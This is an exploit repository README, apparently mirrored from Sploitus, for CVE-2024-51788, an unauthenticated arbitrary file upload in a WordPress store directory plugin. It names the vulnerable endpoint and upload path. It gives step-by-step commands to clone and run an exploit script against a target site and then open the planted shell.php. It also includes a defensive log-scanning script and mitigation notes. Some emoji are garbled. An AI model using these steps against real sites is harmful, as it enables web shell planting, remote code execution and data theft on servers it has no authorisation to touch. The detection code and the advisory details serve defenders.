## https://sploitus.com/exploit?id=7209410C-E438-57A1-8A54-E628D55E043A
# 💀 CVE-2024-51788 - WordPress The Novel Design Store Directory Plugin <= 4.3.0 - Unauthenticated Arbitrary File Upload

## 🚨 Overview
**CVE-2024-51788** is a newly disclosed **critical** vulnerability affecting **The Novel Design Store Directory** WordPress plugin (**<= v4.3.0**). This flaw allows **unauthenticated attackers** to upload arbitrary files, including **malicious web shells**, leading to **Remote Code Execution (RCE)** on the affected server.

🔴 **Severity:** 10.0 / 10 (Critical)  
📅 **Published:** November 11, 2024  
📅 **Updated:** November 12, 2024  
🔗 **CWE ID:** [CWE-434 - Unrestricted File Upload](https://cwe.mitre.org/data/definitions/434.html)  

---
## 🛑 Impact
✅ **Full server compromise** - Attackers can gain complete control over the website and execute arbitrary commands.  
✅ **Data Breach** - Access and modification of sensitive information.  
✅ **Website defacement & malware injection** - Attackers can modify website content or plant malware.  
✅ **Privilege escalation** - Attackers may exploit this to escalate privileges and move laterally within the network.  

---
## ⚡ Exploit Details
The vulnerability exists due to **improper validation** of uploaded files in the **wp-admin/options-general.php?page=licence** endpoint. Attackers can upload **malicious PHP scripts** into the **/wp-content/plugins/noveldesign-store-directory/images/** directory without authentication, ultimately leading to **Remote Code Execution (RCE)**.

🚨 **Key factors enabling the attack:**
- No authentication required.
- Unrestricted file upload.
- The uploaded files are directly executable.

### ๐Ÿ› ๏ธ Exploit Script Overview
A Python-based exploit script has been developed to automate the exploitation process. This script:

โœ… **Bypasses authentication** using random user agents & cookies.  
โœ… **Uploads a malicious PHP shell** directly to the server.  
โœ… **Executes arbitrary commands** on the compromised machine.  
โœ… **Automatically detects if the target is vulnerable.**  

📌 **Exploit Usage:**
```bash
usage: CVE-2024-51788.py [-h] -u URL

Exploit script for CVE-2024-51788 # by Nxploit Khaled Alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
```
If successful, the shell will be uploaded to:
```
/wp-content/plugins/noveldesign-store-directory/images/
```

---
## 🚀 Exploitation Steps
1️⃣ **Clone the repository:**  
```bash
git clone https://github.com/Nxploit/CVE-2024-51788.git
cd CVE-2024-51788
```
2๏ธโƒฃ **Run the exploit script:**  
```bash
python3 CVE-2024-51788.py -u http://target-wordpress-site.com
```
3๏ธโƒฃ **Access the uploaded shell:**  
```bash
http://target-wordpress-site.com/wp-content/plugins/noveldesign-store-directory/images/shell.php
```
### Dependencies
To ensure the exploit script runs smoothly, install the required dependencies using the following command:

```
pip install requests argparse urllib3
```

---
## ๐Ÿ›ก๏ธ Mitigation & Fixes
๐Ÿ”น **Update to the latest version** of The Novel Design Store Directory plugin.  
๐Ÿ”น **Restrict file upload permissions** to allow only safe file types.  
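
A log check for the two request patterns described under Exploit Details, as an added example that is not part of the original repository: it flags POSTs to the `page=licence` endpoint and requests for script files under the plugin's `images/` directory. The combined access-log format, the extension list and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and upload directory as named in the advisory text.
UPLOAD_ENDPOINT = "/wp-admin/options-general.php"
UPLOAD_DIR = "/wp-content/plugins/noveldesign-store-directory/images/"
# Extensions often mapped to the PHP handler (assumption: adjust to your server).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (indicator, ip, time, target, status) for a suspicious line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, when, method, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)  # decode %xx so encoded paths still match
    pages = parse_qs(url.query).get("page", [])
    if method == "POST" and path == UPLOAD_ENDPOINT and "licence" in pages:
        return ("upload-attempt", ip, when, target, int(status))
    if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
        return ("script-in-upload-dir", ip, when, target, int(status))
    return None

def scan(lines):
    """Return every flagged request, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [12/Nov/2024:10:01:02 +0000] "POST /wp-admin/options-general.php?page=licence HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [12/Nov/2024:10:01:05 +0000] "GET /wp-content/plugins/noveldesign-store-directory/images/shell.php HTTP/1.1" 200 20 "-" "-"',
    '198.51.100.4 - - [12/Nov/2024:10:02:00 +0000] "GET /wp-content/plugins/noveldesign-store-directory/images/logo.png HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.4 - - [12/Nov/2024:10:02:09 +0000] "GET /wp-admin/options-general.php HTTP/1.1" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

A POST from a logged-in administrator matches the first rule as well, so compare hits against known admin source addresses. A `200` status on a `script-in-upload-dir` hit means the server answered the request for that file and the directory contents should be reviewed.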

  


---
## ๐Ÿ“ Disclaimer
โš ๏ธ **This exploit is for educational and research purposes only.** Unauthorized use of this exploit against systems without proper authorization is **illegal**. The author is not responsible for any misuse of this information.

---
## 🔗 References
- [NVD CVE-2024-51788](https://nvd.nist.gov/vuln/detail/CVE-2024-51788)  
- [Patchstack Advisory](https://patchstack.com/database/vulnerability/noveldesign-store-directory)  

---
**_By: Nxploit | Khaled Alenazi_**